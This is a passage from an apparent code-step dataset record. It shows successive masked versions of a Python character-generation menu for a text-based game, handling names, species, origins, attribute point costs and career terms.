% match.group(2))\n return 'node_attributes'\n value = int(match.group(1))\n if not value or value < 0:\n error(caller, 'Value to adjust must be a positive number.')\n return 'node_attributes'\n attribute_value = caller.ndb._menutree.character['stats'][attribute.name]\n if not is_add and attribute_value - value < 10:\n error(caller, attribute.name + ' cannot be reduced below 10.')\n return 'node_attributes'\n i_value = value\n cost = 0\n while i_value > 0:\n if is_add:\n new_value = i_value + attribute_value\n else:\n new_value = attribute_value - i_value\n if new_value <= 12:\n cost += 4\n elif new_value <= 16:\n cost += 2\n elif new_value <= 23:\n cost += 1\n elif new_value <= 26:\n cost += 2\n elif new_value <= 30:\n cost += 4\n i_value -= 1\n if not is_add:\n cost *= -1\n if cost > caller.ndb._menutree.points['attributes']:\n deficit = (caller.ndb._menutree.points['attributes'] - cost) * -1\n error(caller, 'Raising %s' % attribute.name + \n ' costs %s total points,' % cost + \n ' %s more points than you have available.' % deficit)\n return 'node_attributes'\n if is_add:\n caller.ndb._menutree.character['stats'][attribute.name] += value\n else:\n caller.ndb._menutree.character['stats'][attribute.name] -= value\n caller.ndb._menutree.points['attributes'] -= cost\n msg = ('Successfully set %s ' % attribute.name + 'to %s' % caller.ndb.\n _menutree.character['stats'][attribute.name])\n msg += ' for %s points.' 
% cost\n success(caller, msg)\n return 'node_attributes'\n\n\ndef node_finish(caller):\n text = ''\n options = ()\n return text, options\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef start(caller):\n if not caller:\n return\n caller.ndb._menutree.points = {'attributes': 20, 'skills': 20}\n caller.ndb._menutree.character = {'home_planet': None, 'full_name':\n None, 'origin': None, 'stats': {}, 'age': 16, 'is_psionic': False,\n 'current_term': 0, 'species': 'human'}\n caller.ndb._menutree.terms = []\n for attribute in AttributeEnum:\n caller.ndb._menutree.character['stats'][attribute.name] = 20\n text = \"\"\"\n Welcome to Singularity's Character Generator!\n \n Have a paragraph about WTF is going on and some info about our game. Also here are some warnings\n that you *definitely* shouldn't make multiple characters. And also here's some commands to\n help get you more info! TBD!!!\n \n |yPlease do not make multiple characters to game chargen.|n\n \n When you're ready, go ahead and like.. 
type |ybegin|n to start CharGen.\n \"\"\"\n return text, {'key': 'begin', 'goto': 'node_menu'}\n\n\n<mask token>\n\n\ndef node_basics(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name:\n name = 'Not Set'\n species = character['species']\n origin = character['origin']\n if not origin:\n origin = 'Not Set'\n age = character['age']\n text = (\n \"\"\"\n |wFull Name:|n %s\n |wAdolescent Age:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Type |yhelp <command>|n to get info on available choices.\n \"\"\"\n % (name, age, species, origin))\n options = {'key': 'return', 'goto': 'node_menu'}, {'key': 'full_name',\n 'goto': _node_basics_full_name}, {'key': 'age', 'goto':\n _node_basics_age}, {'key': 'species', 'goto': _node_basics_species}, {\n 'key': 'origin', 'goto': _node_basics_origin}\n return text, options\n\n\ndef _node_basics_full_name(caller):\n\n def callback(caller, prompt, user_input):\n caller.msg(\"You set your character's full name to: %s.\" % user_input)\n caller.ndb._menutree.character['full_name'] = user_input\n get_input(caller, \">> Enter your character's full name.\", callback)\n\n\ndef _node_basics_age(caller):\n\n def callback(caller, prompt, user_input):\n species = next(s for s in CHARGEN['species'] if s['key'] == caller.\n ndb._menutree.character['species'])\n if not user_input.is_integer() or int(user_input) < species[\n 'min_start_age'] or int(user_input) > species['max_start_age']:\n caller.msg('Age must be a valid number between %s and %s.' 
% (\n species['min_start_age'], species['max_start_age']))\n return\n caller.msg(\"You set your character's age to: %s.\" % user_input)\n caller.ndb._menutree.character['age'] = int(user_input)\n get_input(caller, \">> Enter your character's age.\", callback)\n\n\n<mask token>\n\n\ndef _is_attributes_done(caller):\n if caller.ndb._menutree.points['attributes'] != 0:\n return False, 'All attribute points must be allocated.'\n return True, ''\n\n\ndef _is_basics_done(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name or len(name) < 3:\n return (False,\n 'Full name must have a value and be longer than 3 characters.')\n origin = character['origin']\n if not origin:\n return False, 'Must select an origin.'\n species_stats = next(s for s in CHARGEN['species'] if s['key'] ==\n character['species'])\n age = character['age']\n if age < species_stats['min_start_age']:\n return False, 'Age must be equal to or more than %s.' % species_stats[\n 'min_start_age']\n if age > species_stats['max_start_age']:\n return False, 'Age must be equal to or less than %s.' 
% species_stats[\n 'max_start_age']\n return True, ''\n\n\ndef _is_skills_done(caller):\n return False, ''\n\n\ndef _is_life_done(caller):\n return False, ''\n\n\n<mask token>\n\n\ndef node_attributes(caller):\n text = ''\n for attribute in AttributeEnum:\n if (attribute == AttributeEnum.Psi and not caller.ndb._menutree.\n character['is_psionic']):\n continue\n text += '%s: ' % attribute.name\n text += '%s\\r\\n' % caller.ndb._menutree.character['stats'][attribute\n .name]\n text += '\\r\\n%s points remaining.\\r\\n' % caller.ndb._menutree.points[\n 'attributes']\n text += (\n '\\r\\nType \"|yadd <number> to <attribute>|n\" to adjust an attribute positively.'\n )\n text += (\n '\\r\\nType \"|ysub <number> from <attribute>|n\" to adjust an attribute negatively.'\n )\n options = {'key': '_default', 'goto': _node_attributes}, {'key':\n 'return', 'goto': 'node_menu'}\n return text, options\n\n\n<mask token>\n\n\ndef node_terms(caller):\n text = ''\n term_count = 1\n for term in caller.ndb._menutree.terms:\n text += '\\r\\n* Term %s:' % term_count + ' %s' % term.title\n term_count += 1\n age = caller.ndb._menutree.character['age'\n ] + 4 * caller.ndb._menutree.character['current_term']\n text += '\\r\\nCurrent Character Age: %s' % age\n text += '\\r\\n\\r\\nType \"|ychoose <term>|n\" to begin a term.'\n options = {'key': '_default', 'goto': _node_terms}, {'key':\n 'list choices', 'goto': _list_term_choices}, {'key': 'finish',\n 'goto': 'node_finish'}\n return text, options\n\n\ndef _node_terms(caller, raw_string):\n match = re.match('choose (\\\\w+)', raw_string)\n if not match:\n error(caller, \"I didn't understand that.\")\n return 'node_terms'\n term_token = match.group(1).lower()\n term = next((x for x in TERMS if x['title'].lower().startswith(\n term_token)), None)\n if not term:\n error(caller,\n '%s is not a valid term. 
Type \"|ylist choices|n\" to get a list of all available careers.'\n )\n return 'node_terms'\n caller.ndb._menutree.terms.append({'term': term['title']})\n return 'node_term'\n\n\n<mask token>\n\n\ndef node_term(caller):\n term_title = caller.ndb._menutree.terms[len(caller.ndb._menutree.terms) - 1\n ]['term']\n text = 'Career: %s' % term_title\n text += '\\r\\nAssignment: Not Set'\n text += '\\r\\nPersonal Advancement: Not Set'\n text += '\\r\\nYears: %s' % caller.ndb._menutree.character['age']\n text += '-%s' % (caller.ndb._menutree.character['age'] + 4)\n text += '\\r\\n\\r\\nLife Event: |y1 Available|n'\n text += (\n '\\r\\n\\r\\nType \"|yset Assignment to <assignment>|n\" to choose an assignment.'\n )\n text += (\n '\\r\\nType \"|yset Advancement to <option>|n\" to choose a personal advancement.'\n )\n text += (\n '\\r\\n\\r\\nRolling for a life event is optional and may yield positive or negative results. '\n )\n text += (\n \"Once you've chosen to roll a life event, the result cannot be rerolled or changed except through mulligan.\"\n )\n options = {'key': 'show assignments', 'goto': _list_term_assignments}, {\n 'key': 'show advancements', 'goto': _list_term_advancements}, {'key':\n 'roll life event', 'goto': _do_life_event}\n return text, options\n\n\ndef _list_term_advancements(caller):\n return 'node_term'\n\n\n<mask token>\n\n\ndef adjust_attribute(caller, match, is_add):\n attribute_token = match.group(2).lower()\n attribute = next((x for x in AttributeEnum if x.name.lower().startswith\n (attribute_token)), None)\n if not attribute:\n error(caller, '%s is not a valid attribute.' 
% match.group(2))\n return 'node_attributes'\n value = int(match.group(1))\n if not value or value < 0:\n error(caller, 'Value to adjust must be a positive number.')\n return 'node_attributes'\n attribute_value = caller.ndb._menutree.character['stats'][attribute.name]\n if not is_add and attribute_value - value < 10:\n error(caller, attribute.name + ' cannot be reduced below 10.')\n return 'node_attributes'\n i_value = value\n cost = 0\n while i_value > 0:\n if is_add:\n new_value = i_value + attribute_value\n else:\n new_value = attribute_value - i_value\n if new_value <= 12:\n cost += 4\n elif new_value <= 16:\n cost += 2\n elif new_value <= 23:\n cost += 1\n elif new_value <= 26:\n cost += 2\n elif new_value <= 30:\n cost += 4\n i_value -= 1\n if not is_add:\n cost *= -1\n if cost > caller.ndb._menutree.points['attributes']:\n deficit = (caller.ndb._menutree.points['attributes'] - cost) * -1\n error(caller, 'Raising %s' % attribute.name + \n ' costs %s total points,' % cost + \n ' %s more points than you have available.' % deficit)\n return 'node_attributes'\n if is_add:\n caller.ndb._menutree.character['stats'][attribute.name] += value\n else:\n caller.ndb._menutree.character['stats'][attribute.name] -= value\n caller.ndb._menutree.points['attributes'] -= cost\n msg = ('Successfully set %s ' % attribute.name + 'to %s' % caller.ndb.\n _menutree.character['stats'][attribute.name])\n msg += ' for %s points.' 
% cost\n success(caller, msg)\n return 'node_attributes'\n\n\ndef node_finish(caller):\n text = ''\n options = ()\n return text, options\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef start(caller):\n if not caller:\n return\n caller.ndb._menutree.points = {'attributes': 20, 'skills': 20}\n caller.ndb._menutree.character = {'home_planet': None, 'full_name':\n None, 'origin': None, 'stats': {}, 'age': 16, 'is_psionic': False,\n 'current_term': 0, 'species': 'human'}\n caller.ndb._menutree.terms = []\n for attribute in AttributeEnum:\n caller.ndb._menutree.character['stats'][attribute.name] = 20\n text = \"\"\"\n Welcome to Singularity's Character Generator!\n \n Have a paragraph about WTF is going on and some info about our game. Also here are some warnings\n that you *definitely* shouldn't make multiple characters. And also here's some commands to\n help get you more info! TBD!!!\n \n |yPlease do not make multiple characters to game chargen.|n\n \n When you're ready, go ahead and like.. type |ybegin|n to start CharGen.\n \"\"\"\n return text, {'key': 'begin', 'goto': 'node_menu'}\n\n\ndef node_menu(caller):\n name = caller.ndb._menutree.character['full_name']\n if not name:\n name = 'Not Set'\n species = caller.ndb._menutree.character['species']\n origin = caller.ndb._menutree.character['origin']\n if not origin:\n origin = 'Not Set'\n d_b = '|gOk|n' if _is_basics_done(caller)[0] else '|rNo|n'\n d_a = '|gOk|n' if _is_attributes_done(caller)[0] else '|rNo|n'\n d_s = '|gOk|n' if _is_skills_done(caller)[0] else '|rNo|n'\n d_l = '|gOk|n' if _is_life_done(caller)[0] else '|rNo|n'\n text = (\n \"\"\"\n Below are the general details of your character. Use the below commands\n to navigate through chargen steps. 
Some steps may appear after others are completed.\n \n |wFull Name:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Completed:\n |wBasics:|n %s\n |wAttributes:|n %s\n |wStarting Skills:|n %s\n |wLife path:|n %s \n \"\"\"\n % (name, species, origin, d_b, d_a, d_s, d_l))\n options = {'key': 'basics', 'goto': 'node_basics'}, {'key':\n 'attributes', 'goto': 'node_attributes'}, {'key': 'skills', 'goto':\n 'node_skills'}\n if _is_basics_done(caller)[0] and _is_attributes_done(caller)[0\n ] and _is_skills_done(caller)[0]:\n options.append({'key': 'life path', 'goto': 'node_terms'})\n if _is_life_done(caller)[0]:\n options.append({'key': 'finish', 'goto': 'node_finish'})\n return text, options\n\n\ndef node_basics(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name:\n name = 'Not Set'\n species = character['species']\n origin = character['origin']\n if not origin:\n origin = 'Not Set'\n age = character['age']\n text = (\n \"\"\"\n |wFull Name:|n %s\n |wAdolescent Age:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Type |yhelp <command>|n to get info on available choices.\n \"\"\"\n % (name, age, species, origin))\n options = {'key': 'return', 'goto': 'node_menu'}, {'key': 'full_name',\n 'goto': _node_basics_full_name}, {'key': 'age', 'goto':\n _node_basics_age}, {'key': 'species', 'goto': _node_basics_species}, {\n 'key': 'origin', 'goto': _node_basics_origin}\n return text, options\n\n\ndef _node_basics_full_name(caller):\n\n def callback(caller, prompt, user_input):\n caller.msg(\"You set your character's full name to: %s.\" % user_input)\n caller.ndb._menutree.character['full_name'] = user_input\n get_input(caller, \">> Enter your character's full name.\", callback)\n\n\ndef _node_basics_age(caller):\n\n def callback(caller, prompt, user_input):\n species = next(s for s in CHARGEN['species'] if s['key'] == caller.\n ndb._menutree.character['species'])\n if not user_input.is_integer() or int(user_input) < species[\n 
'min_start_age'] or int(user_input) > species['max_start_age']:\n caller.msg('Age must be a valid number between %s and %s.' % (\n species['min_start_age'], species['max_start_age']))\n return\n caller.msg(\"You set your character's age to: %s.\" % user_input)\n caller.ndb._menutree.character['age'] = int(user_input)\n get_input(caller, \">> Enter your character's age.\", callback)\n\n\ndef _node_basics_species(caller):\n\n def callback(caller, prompt, user_input):\n character = caller.ndb._menutree.character\n species = next((s for s in SPECIES if s['title'].lower().startswith\n (user_input.lower())), None)\n if not species:\n caller.msg(\n \"'%s' is not a valid species. Valid species: |wHuman|n, and |wAndroid.|n\"\n % user_input)\n return\n species_chargen = next(s for s in CHARGEN['species'] if s['key'] ==\n species['key'])\n caller.msg(\"You set your character's species to: %s.\" % species[\n 'title'])\n character['age'] = species_chargen['min_age']\n character['origin'] = None\n character['species'] = species['key']\n get_input(caller, \">> Enter your character's species.\", callback)\n\n\ndef _node_basics_origin(caller):\n\n def callback(caller, prompt, user_input):\n character = caller.ndb._menutree.character\n origins = filter(lambda o: character['species'] in o[\n 'species_restrictions'], CHARGEN['origins'])\n origin = next((o for o in origins if o['title'].lower().startswith(\n user_input.lower())), None)\n if not origin:\n caller.msg(\n \"'%s' is not a valid origin choice. 
Valid choices: %s\" % (\n user_input, list_to_string(map(lambda o: o['title'], origins)))\n )\n return\n caller.msg(\"You set your character's origin to: %s.\" % user_input)\n character['origin'] = origin['key']\n get_input(caller, \">> Enter your character's origin.\", callback)\n\n\ndef _is_attributes_done(caller):\n if caller.ndb._menutree.points['attributes'] != 0:\n return False, 'All attribute points must be allocated.'\n return True, ''\n\n\ndef _is_basics_done(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name or len(name) < 3:\n return (False,\n 'Full name must have a value and be longer than 3 characters.')\n origin = character['origin']\n if not origin:\n return False, 'Must select an origin.'\n species_stats = next(s for s in CHARGEN['species'] if s['key'] ==\n character['species'])\n age = character['age']\n if age < species_stats['min_start_age']:\n return False, 'Age must be equal to or more than %s.' % species_stats[\n 'min_start_age']\n if age > species_stats['max_start_age']:\n return False, 'Age must be equal to or less than %s.' 
% species_stats[\n 'max_start_age']\n return True, ''\n\n\ndef _is_skills_done(caller):\n return False, ''\n\n\ndef _is_life_done(caller):\n return False, ''\n\n\n<mask token>\n\n\ndef node_attributes(caller):\n text = ''\n for attribute in AttributeEnum:\n if (attribute == AttributeEnum.Psi and not caller.ndb._menutree.\n character['is_psionic']):\n continue\n text += '%s: ' % attribute.name\n text += '%s\\r\\n' % caller.ndb._menutree.character['stats'][attribute\n .name]\n text += '\\r\\n%s points remaining.\\r\\n' % caller.ndb._menutree.points[\n 'attributes']\n text += (\n '\\r\\nType \"|yadd <number> to <attribute>|n\" to adjust an attribute positively.'\n )\n text += (\n '\\r\\nType \"|ysub <number> from <attribute>|n\" to adjust an attribute negatively.'\n )\n options = {'key': '_default', 'goto': _node_attributes}, {'key':\n 'return', 'goto': 'node_menu'}\n return text, options\n\n\n<mask token>\n\n\ndef node_terms(caller):\n text = ''\n term_count = 1\n for term in caller.ndb._menutree.terms:\n text += '\\r\\n* Term %s:' % term_count + ' %s' % term.title\n term_count += 1\n age = caller.ndb._menutree.character['age'\n ] + 4 * caller.ndb._menutree.character['current_term']\n text += '\\r\\nCurrent Character Age: %s' % age\n text += '\\r\\n\\r\\nType \"|ychoose <term>|n\" to begin a term.'\n options = {'key': '_default', 'goto': _node_terms}, {'key':\n 'list choices', 'goto': _list_term_choices}, {'key': 'finish',\n 'goto': 'node_finish'}\n return text, options\n\n\ndef _node_terms(caller, raw_string):\n match = re.match('choose (\\\\w+)', raw_string)\n if not match:\n error(caller, \"I didn't understand that.\")\n return 'node_terms'\n term_token = match.group(1).lower()\n term = next((x for x in TERMS if x['title'].lower().startswith(\n term_token)), None)\n if not term:\n error(caller,\n '%s is not a valid term. 
Type \"|ylist choices|n\" to get a list of all available careers.'\n )\n return 'node_terms'\n caller.ndb._menutree.terms.append({'term': term['title']})\n return 'node_term'\n\n\n<mask token>\n\n\ndef node_term(caller):\n term_title = caller.ndb._menutree.terms[len(caller.ndb._menutree.terms) - 1\n ]['term']\n text = 'Career: %s' % term_title\n text += '\\r\\nAssignment: Not Set'\n text += '\\r\\nPersonal Advancement: Not Set'\n text += '\\r\\nYears: %s' % caller.ndb._menutree.character['age']\n text += '-%s' % (caller.ndb._menutree.character['age'] + 4)\n text += '\\r\\n\\r\\nLife Event: |y1 Available|n'\n text += (\n '\\r\\n\\r\\nType \"|yset Assignment to <assignment>|n\" to choose an assignment.'\n )\n text += (\n '\\r\\nType \"|yset Advancement to <option>|n\" to choose a personal advancement.'\n )\n text += (\n '\\r\\n\\r\\nRolling for a life event is optional and may yield positive or negative results. '\n )\n text += (\n \"Once you've chosen to roll a life event, the result cannot be rerolled or changed except through mulligan.\"\n )\n options = {'key': 'show assignments', 'goto': _list_term_assignments}, {\n 'key': 'show advancements', 'goto': _list_term_advancements}, {'key':\n 'roll life event', 'goto': _do_life_event}\n return text, options\n\n\ndef _list_term_advancements(caller):\n return 'node_term'\n\n\n<mask token>\n\n\ndef adjust_attribute(caller, match, is_add):\n attribute_token = match.group(2).lower()\n attribute = next((x for x in AttributeEnum if x.name.lower().startswith\n (attribute_token)), None)\n if not attribute:\n error(caller, '%s is not a valid attribute.' 
% match.group(2))\n return 'node_attributes'\n value = int(match.group(1))\n if not value or value < 0:\n error(caller, 'Value to adjust must be a positive number.')\n return 'node_attributes'\n attribute_value = caller.ndb._menutree.character['stats'][attribute.name]\n if not is_add and attribute_value - value < 10:\n error(caller, attribute.name + ' cannot be reduced below 10.')\n return 'node_attributes'\n i_value = value\n cost = 0\n while i_value > 0:\n if is_add:\n new_value = i_value + attribute_value\n else:\n new_value = attribute_value - i_value\n if new_value <= 12:\n cost += 4\n elif new_value <= 16:\n cost += 2\n elif new_value <= 23:\n cost += 1\n elif new_value <= 26:\n cost += 2\n elif new_value <= 30:\n cost += 4\n i_value -= 1\n if not is_add:\n cost *= -1\n if cost > caller.ndb._menutree.points['attributes']:\n deficit = (caller.ndb._menutree.points['attributes'] - cost) * -1\n error(caller, 'Raising %s' % attribute.name + \n ' costs %s total points,' % cost + \n ' %s more points than you have available.' % deficit)\n return 'node_attributes'\n if is_add:\n caller.ndb._menutree.character['stats'][attribute.name] += value\n else:\n caller.ndb._menutree.character['stats'][attribute.name] -= value\n caller.ndb._menutree.points['attributes'] -= cost\n msg = ('Successfully set %s ' % attribute.name + 'to %s' % caller.ndb.\n _menutree.character['stats'][attribute.name])\n msg += ' for %s points.' 
% cost\n success(caller, msg)\n return 'node_attributes'\n\n\ndef node_finish(caller):\n text = ''\n options = ()\n return text, options\n\n\n<mask token>\n\n\ndef error(caller, msg):\n caller.msg('|y<|rError|y>|n %s' % msg)\n", "step-4": "<mask token>\n\n\ndef start(caller):\n if not caller:\n return\n caller.ndb._menutree.points = {'attributes': 20, 'skills': 20}\n caller.ndb._menutree.character = {'home_planet': None, 'full_name':\n None, 'origin': None, 'stats': {}, 'age': 16, 'is_psionic': False,\n 'current_term': 0, 'species': 'human'}\n caller.ndb._menutree.terms = []\n for attribute in AttributeEnum:\n caller.ndb._menutree.character['stats'][attribute.name] = 20\n text = \"\"\"\n Welcome to Singularity's Character Generator!\n \n Have a paragraph about WTF is going on and some info about our game. Also here are some warnings\n that you *definitely* shouldn't make multiple characters. And also here's some commands to\n help get you more info! TBD!!!\n \n |yPlease do not make multiple characters to game chargen.|n\n \n When you're ready, go ahead and like.. type |ybegin|n to start CharGen.\n \"\"\"\n return text, {'key': 'begin', 'goto': 'node_menu'}\n\n\ndef node_menu(caller):\n name = caller.ndb._menutree.character['full_name']\n if not name:\n name = 'Not Set'\n species = caller.ndb._menutree.character['species']\n origin = caller.ndb._menutree.character['origin']\n if not origin:\n origin = 'Not Set'\n d_b = '|gOk|n' if _is_basics_done(caller)[0] else '|rNo|n'\n d_a = '|gOk|n' if _is_attributes_done(caller)[0] else '|rNo|n'\n d_s = '|gOk|n' if _is_skills_done(caller)[0] else '|rNo|n'\n d_l = '|gOk|n' if _is_life_done(caller)[0] else '|rNo|n'\n text = (\n \"\"\"\n Below are the general details of your character. Use the below commands\n to navigate through chargen steps. 
Some steps may appear after others are completed.\n \n |wFull Name:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Completed:\n |wBasics:|n %s\n |wAttributes:|n %s\n |wStarting Skills:|n %s\n |wLife path:|n %s \n \"\"\"\n % (name, species, origin, d_b, d_a, d_s, d_l))\n options = {'key': 'basics', 'goto': 'node_basics'}, {'key':\n 'attributes', 'goto': 'node_attributes'}, {'key': 'skills', 'goto':\n 'node_skills'}\n if _is_basics_done(caller)[0] and _is_attributes_done(caller)[0\n ] and _is_skills_done(caller)[0]:\n options.append({'key': 'life path', 'goto': 'node_terms'})\n if _is_life_done(caller)[0]:\n options.append({'key': 'finish', 'goto': 'node_finish'})\n return text, options\n\n\ndef node_basics(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name:\n name = 'Not Set'\n species = character['species']\n origin = character['origin']\n if not origin:\n origin = 'Not Set'\n age = character['age']\n text = (\n \"\"\"\n |wFull Name:|n %s\n |wAdolescent Age:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Type |yhelp <command>|n to get info on available choices.\n \"\"\"\n % (name, age, species, origin))\n options = {'key': 'return', 'goto': 'node_menu'}, {'key': 'full_name',\n 'goto': _node_basics_full_name}, {'key': 'age', 'goto':\n _node_basics_age}, {'key': 'species', 'goto': _node_basics_species}, {\n 'key': 'origin', 'goto': _node_basics_origin}\n return text, options\n\n\ndef _node_basics_full_name(caller):\n\n def callback(caller, prompt, user_input):\n caller.msg(\"You set your character's full name to: %s.\" % user_input)\n caller.ndb._menutree.character['full_name'] = user_input\n get_input(caller, \">> Enter your character's full name.\", callback)\n\n\ndef _node_basics_age(caller):\n\n def callback(caller, prompt, user_input):\n species = next(s for s in CHARGEN['species'] if s['key'] == caller.\n ndb._menutree.character['species'])\n if not user_input.is_integer() or int(user_input) < species[\n 
'min_start_age'] or int(user_input) > species['max_start_age']:\n caller.msg('Age must be a valid number between %s and %s.' % (\n species['min_start_age'], species['max_start_age']))\n return\n caller.msg(\"You set your character's age to: %s.\" % user_input)\n caller.ndb._menutree.character['age'] = int(user_input)\n get_input(caller, \">> Enter your character's age.\", callback)\n\n\ndef _node_basics_species(caller):\n\n def callback(caller, prompt, user_input):\n character = caller.ndb._menutree.character\n species = next((s for s in SPECIES if s['title'].lower().startswith\n (user_input.lower())), None)\n if not species:\n caller.msg(\n \"'%s' is not a valid species. Valid species: |wHuman|n, and |wAndroid.|n\"\n % user_input)\n return\n species_chargen = next(s for s in CHARGEN['species'] if s['key'] ==\n species['key'])\n caller.msg(\"You set your character's species to: %s.\" % species[\n 'title'])\n character['age'] = species_chargen['min_age']\n character['origin'] = None\n character['species'] = species['key']\n get_input(caller, \">> Enter your character's species.\", callback)\n\n\ndef _node_basics_origin(caller):\n\n def callback(caller, prompt, user_input):\n character = caller.ndb._menutree.character\n origins = filter(lambda o: character['species'] in o[\n 'species_restrictions'], CHARGEN['origins'])\n origin = next((o for o in origins if o['title'].lower().startswith(\n user_input.lower())), None)\n if not origin:\n caller.msg(\n \"'%s' is not a valid origin choice. 
Valid choices: %s\" % (\n user_input, list_to_string(map(lambda o: o['title'], origins)))\n )\n return\n caller.msg(\"You set your character's origin to: %s.\" % user_input)\n character['origin'] = origin['key']\n get_input(caller, \">> Enter your character's origin.\", callback)\n\n\ndef _is_attributes_done(caller):\n if caller.ndb._menutree.points['attributes'] != 0:\n return False, 'All attribute points must be allocated.'\n return True, ''\n\n\ndef _is_basics_done(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name or len(name) < 3:\n return (False,\n 'Full name must have a value and be longer than 3 characters.')\n origin = character['origin']\n if not origin:\n return False, 'Must select an origin.'\n species_stats = next(s for s in CHARGEN['species'] if s['key'] ==\n character['species'])\n age = character['age']\n if age < species_stats['min_start_age']:\n return False, 'Age must be equal to or more than %s.' % species_stats[\n 'min_start_age']\n if age > species_stats['max_start_age']:\n return False, 'Age must be equal to or less than %s.' 
% species_stats[\n 'max_start_age']\n return True, ''\n\n\ndef _is_skills_done(caller):\n return False, ''\n\n\ndef _is_life_done(caller):\n return False, ''\n\n\n<mask token>\n\n\ndef node_attributes(caller):\n text = ''\n for attribute in AttributeEnum:\n if (attribute == AttributeEnum.Psi and not caller.ndb._menutree.\n character['is_psionic']):\n continue\n text += '%s: ' % attribute.name\n text += '%s\\r\\n' % caller.ndb._menutree.character['stats'][attribute\n .name]\n text += '\\r\\n%s points remaining.\\r\\n' % caller.ndb._menutree.points[\n 'attributes']\n text += (\n '\\r\\nType \"|yadd <number> to <attribute>|n\" to adjust an attribute positively.'\n )\n text += (\n '\\r\\nType \"|ysub <number> from <attribute>|n\" to adjust an attribute negatively.'\n )\n options = {'key': '_default', 'goto': _node_attributes}, {'key':\n 'return', 'goto': 'node_menu'}\n return text, options\n\n\ndef _node_attributes(caller, raw_string):\n match = re.match('add (\\\\d+) to (\\\\w+)', raw_string)\n if match:\n return adjust_attribute(caller, match, True)\n match = re.match('sub (\\\\d+) from (\\\\w+)', raw_string)\n if match:\n return adjust_attribute(caller, match, False)\n if not match:\n return 'node_attributes'\n\n\ndef node_terms(caller):\n text = ''\n term_count = 1\n for term in caller.ndb._menutree.terms:\n text += '\\r\\n* Term %s:' % term_count + ' %s' % term.title\n term_count += 1\n age = caller.ndb._menutree.character['age'\n ] + 4 * caller.ndb._menutree.character['current_term']\n text += '\\r\\nCurrent Character Age: %s' % age\n text += '\\r\\n\\r\\nType \"|ychoose <term>|n\" to begin a term.'\n options = {'key': '_default', 'goto': _node_terms}, {'key':\n 'list choices', 'goto': _list_term_choices}, {'key': 'finish',\n 'goto': 'node_finish'}\n return text, options\n\n\ndef _node_terms(caller, raw_string):\n match = re.match('choose (\\\\w+)', raw_string)\n if not match:\n error(caller, \"I didn't understand that.\")\n return 'node_terms'\n term_token = 
match.group(1).lower()\n term = next((x for x in TERMS if x['title'].lower().startswith(\n term_token)), None)\n if not term:\n error(caller,\n '%s is not a valid term. Type \"|ylist choices|n\" to get a list of all available careers.'\n )\n return 'node_terms'\n caller.ndb._menutree.terms.append({'term': term['title']})\n return 'node_term'\n\n\n<mask token>\n\n\ndef node_term(caller):\n term_title = caller.ndb._menutree.terms[len(caller.ndb._menutree.terms) - 1\n ]['term']\n text = 'Career: %s' % term_title\n text += '\\r\\nAssignment: Not Set'\n text += '\\r\\nPersonal Advancement: Not Set'\n text += '\\r\\nYears: %s' % caller.ndb._menutree.character['age']\n text += '-%s' % (caller.ndb._menutree.character['age'] + 4)\n text += '\\r\\n\\r\\nLife Event: |y1 Available|n'\n text += (\n '\\r\\n\\r\\nType \"|yset Assignment to <assignment>|n\" to choose an assignment.'\n )\n text += (\n '\\r\\nType \"|yset Advancement to <option>|n\" to choose a personal advancement.'\n )\n text += (\n '\\r\\n\\r\\nRolling for a life event is optional and may yield positive or negative results. '\n )\n text += (\n \"Once you've chosen to roll a life event, the result cannot be rerolled or changed except through mulligan.\"\n )\n options = {'key': 'show assignments', 'goto': _list_term_assignments}, {\n 'key': 'show advancements', 'goto': _list_term_advancements}, {'key':\n 'roll life event', 'goto': _do_life_event}\n return text, options\n\n\ndef _list_term_advancements(caller):\n return 'node_term'\n\n\n<mask token>\n\n\ndef _do_life_event(caller):\n return 'node_term'\n\n\ndef adjust_attribute(caller, match, is_add):\n attribute_token = match.group(2).lower()\n attribute = next((x for x in AttributeEnum if x.name.lower().startswith\n (attribute_token)), None)\n if not attribute:\n error(caller, '%s is not a valid attribute.' 
% match.group(2))\n return 'node_attributes'\n value = int(match.group(1))\n if not value or value < 0:\n error(caller, 'Value to adjust must be a positive number.')\n return 'node_attributes'\n attribute_value = caller.ndb._menutree.character['stats'][attribute.name]\n if not is_add and attribute_value - value < 10:\n error(caller, attribute.name + ' cannot be reduced below 10.')\n return 'node_attributes'\n i_value = value\n cost = 0\n while i_value > 0:\n if is_add:\n new_value = i_value + attribute_value\n else:\n new_value = attribute_value - i_value\n if new_value <= 12:\n cost += 4\n elif new_value <= 16:\n cost += 2\n elif new_value <= 23:\n cost += 1\n elif new_value <= 26:\n cost += 2\n elif new_value <= 30:\n cost += 4\n i_value -= 1\n if not is_add:\n cost *= -1\n if cost > caller.ndb._menutree.points['attributes']:\n deficit = (caller.ndb._menutree.points['attributes'] - cost) * -1\n error(caller, 'Raising %s' % attribute.name + \n ' costs %s total points,' % cost + \n ' %s more points than you have available.' % deficit)\n return 'node_attributes'\n if is_add:\n caller.ndb._menutree.character['stats'][attribute.name] += value\n else:\n caller.ndb._menutree.character['stats'][attribute.name] -= value\n caller.ndb._menutree.points['attributes'] -= cost\n msg = ('Successfully set %s ' % attribute.name + 'to %s' % caller.ndb.\n _menutree.character['stats'][attribute.name])\n msg += ' for %s points.' 
